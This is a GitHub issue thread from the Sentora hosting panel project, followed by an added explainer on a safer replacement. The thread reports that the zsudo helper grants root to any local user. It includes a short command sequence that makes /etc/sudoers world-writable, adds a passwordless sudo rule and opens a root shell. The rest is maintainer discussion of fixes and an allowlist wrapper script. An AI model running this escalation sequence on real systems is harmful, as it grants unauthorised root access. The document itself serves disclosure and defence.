sentora / sentora-core

Sentora is a web hosting control panel written in PHP for *NIX
GNU General Public License v3.0

zsudo gives root privileges to any local user #179

Closed KaidenP closed 8 years ago

KaidenP commented 9 years ago

I was checking out the zsudo file located at /etc/sentora/panel/bin/zsudo, and noticed that it can grant any local user root privileges. See the following:

Executed as root:

adduser tmp-user
passwd tmp-user

Login as tmp-user:

/etc/sentora/panel/bin/zsudo chmod 777 /etc/sudoers
echo "tmp-user ALL=NOPASSWD:ALL" >> /etc/sudoers
/etc/sentora/panel/bin/zsudo chmod 440 /etc/sudoers
sudo -i

And BAM! You now have a root shell.

bambusoft commented 9 years ago

You can avoid this behaviour using this unofficial security script (still a work in progress), which is not supported by the Sentora team: http://sentora-paranoid.open-source.tk/

Only Ubuntu is covered, but any help is welcome

KaidenP commented 9 years ago

Ok, however is there a way to secure zsudo without apparmor or SELinux? Neither work on my server.

5050 commented 9 years ago

I started a package of scripts to remove zsudo completely and touch all sources that require it so that they use small, secured, predefined scripts, one per function called.

It only needs me to complete it.... it has been on the table for many weeks, but I was too loaded and too tired to work more on them after dinner... I'll try to release them this week.

KaidenP commented 9 years ago

Are they on github?

Caffe1neAdd1ct commented 9 years ago

@5050 This needs to go out for the next release. Please advise when you have completed the new scripts.

MBlagui commented 9 years ago

Notice we only require it for Apache in Sentora core. It could be easily replaced with a script. The issue is keeping compatibility with other modules.

M B
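The fix the thread converges on (5050's "small secured predefined scripts, one per function" and MBlagui's "could be easily replaced with a script") amounts to replacing a generic run-anything-as-root helper with an allowlist: each privileged action is a named entry that maps to a fixed command line, and the caller cannot pass arguments through. The following is an added illustration of that pattern, not code from the Sentora project or from anyone in this thread. The script name `zsudo-safe`, the two action names, the `apachectl` paths and the `DRY_RUN` switch are assumptions made for the example; the intended deployment is a sudoers rule that lets the panel's web user run only this one script as root.

```shell
#!/bin/sh
# zsudo-safe (hypothetical name): a least-privilege replacement for a
# "run any command as root" helper. Every privileged operation the panel
# needs is a fixed entry in allowed_command; nothing else is executed.

# Map an action name to a fixed command line (assumed paths).
# Prints the command on stdout; returns 1 for any unknown action.
allowed_command() {
    case "$1" in
        apache-reload)  echo "/usr/sbin/apachectl graceful" ;;
        apache-restart) echo "/usr/sbin/apachectl restart" ;;
        *)              return 1 ;;
    esac
}

# Dispatch exactly one action. Extra arguments are refused so a caller
# cannot smuggle options or paths into the command that runs as root.
# With DRY_RUN set (assumed switch), the command is printed instead of run.
run_action() {
    if [ "$#" -ne 1 ]; then
        echo "usage: zsudo-safe <action>" >&2
        return 2
    fi
    cmd=$(allowed_command "$1") || {
        echo "refused: '$1' is not an allowed action" >&2
        return 1
    }
    if [ -n "${DRY_RUN:-}" ]; then
        echo "$cmd"
        return 0
    fi
    # The command line is a fixed literal from allowed_command, so word
    # splitting here only separates the program from its fixed flags.
    # shellcheck disable=SC2086
    exec $cmd
}

# When invoked with arguments, act on them; when sourced, only define functions.
[ "$#" -gt 0 ] && run_action "$@"
```

Install it root-owned and non-writable (0755), and grant the web user a sudoers entry for that single path only, for example `www-data ALL=(root) NOPASSWD: /usr/local/sbin/zsudo-safe` (user name and path assumed). Because the action is a name rather than a command, a compromised panel or any local user can at most trigger the predefined reload or restart, and an attempt like the `chmod 777 /etc/sudoers` from the report is rejected as an unknown action.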

MBlagui commented 8 years ago

zsudo will be removed. Also sentora was never made to be used with shared SSH. Closing it.